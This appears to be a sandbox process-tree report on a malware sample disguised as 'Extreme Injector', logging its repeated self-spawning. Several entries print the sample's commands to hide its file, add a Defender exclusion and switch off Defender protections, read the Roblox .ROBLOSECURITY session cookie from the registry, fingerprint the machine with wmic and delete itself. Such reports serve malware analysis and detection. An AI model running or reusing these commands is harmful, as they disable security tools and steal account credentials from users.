        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        54⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        55⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        56⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        57⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        58⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        59⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        60⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        61⤵
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        62⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        63⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        64⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        65⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        66⤵
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        67⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        68⤵
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        69⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        70⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"
        71⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        71⤵
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        70⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        69⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        68⤵
        Drops file in Drivers directory
        
        PID:3020
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        69⤵
        Views/modifies file attributes
        
        PID:288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        69⤵
        
        PID:1712
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        69⤵
        
        PID:3040
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        69⤵
        
        PID:2008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        69⤵
        
        PID:1336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        69⤵
        Detects videocard installed
        
        PID:1392
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        69⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1988
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        70⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        67⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        66⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        65⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        64⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3036
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        65⤵
        Views/modifies file attributes
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        65⤵
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        65⤵
        
        PID:2196
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        65⤵
        
        PID:2400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        65⤵
        
        PID:2456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        65⤵
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        65⤵
        Detects videocard installed
        
        PID:2684
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        65⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2840
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        63⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        62⤵
        Executes dropped EXE
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        61⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1800
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        62⤵
        Views/modifies file attributes
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        62⤵
        
        PID:1868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        62⤵
        
        PID:2396
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        62⤵
        
        PID:2044
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        62⤵
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:932
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        62⤵
        Detects videocard installed
        
        PID:1592
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        62⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2168
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        63⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        60⤵
        Executes dropped EXE
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        59⤵
        Executes dropped EXE
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        58⤵
        Executes dropped EXE
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        57⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1380
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        58⤵
        Views/modifies file attributes
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        58⤵
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        58⤵
        
        PID:3032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        58⤵
        
        PID:2224
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        58⤵
        
        PID:1188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        58⤵
        
        PID:2932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        58⤵
        Detects videocard installed
        
        PID:1592
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2908
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        59⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        56⤵
        Executes dropped EXE
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        55⤵
        Executes dropped EXE
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        54⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2964
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        55⤵
        Views/modifies file attributes
        
        PID:2776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        55⤵
        
        PID:1948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        55⤵
        
        PID:2236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        55⤵
        
        PID:2912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        55⤵
        
        PID:2948
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        55⤵
        
        PID:2572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        55⤵
        Detects videocard installed
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        55⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2164
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        53⤵
        Executes dropped EXE
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        52⤵
        Executes dropped EXE
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        51⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1740
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        52⤵
        Views/modifies file attributes
        
        PID:2680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        52⤵
        
        PID:2780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        52⤵
        
        PID:2200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        52⤵
        
        PID:1908
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        52⤵
        
        PID:1320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        52⤵
        
        PID:2952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        52⤵
        Detects videocard installed
        
        PID:2164
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2884
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        53⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        50⤵
        Executes dropped EXE
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        49⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        48⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1428
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        49⤵
        Views/modifies file attributes
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        49⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        49⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        49⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        49⤵
        
        PID:1604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        49⤵
        
        PID:2024
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        49⤵
        
        PID:1152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        49⤵
        Detects videocard installed
        
        PID:1524
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        49⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2128
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        47⤵
        Executes dropped EXE
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        46⤵
        Executes dropped EXE
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        45⤵
        Executes dropped EXE
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        44⤵
        Executes dropped EXE
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        43⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2288
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        44⤵
        Views/modifies file attributes
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        44⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        44⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        44⤵
        
        PID:2584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        44⤵
        
        PID:1520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        44⤵
        Command and Scripting Interpreter: PowerShell
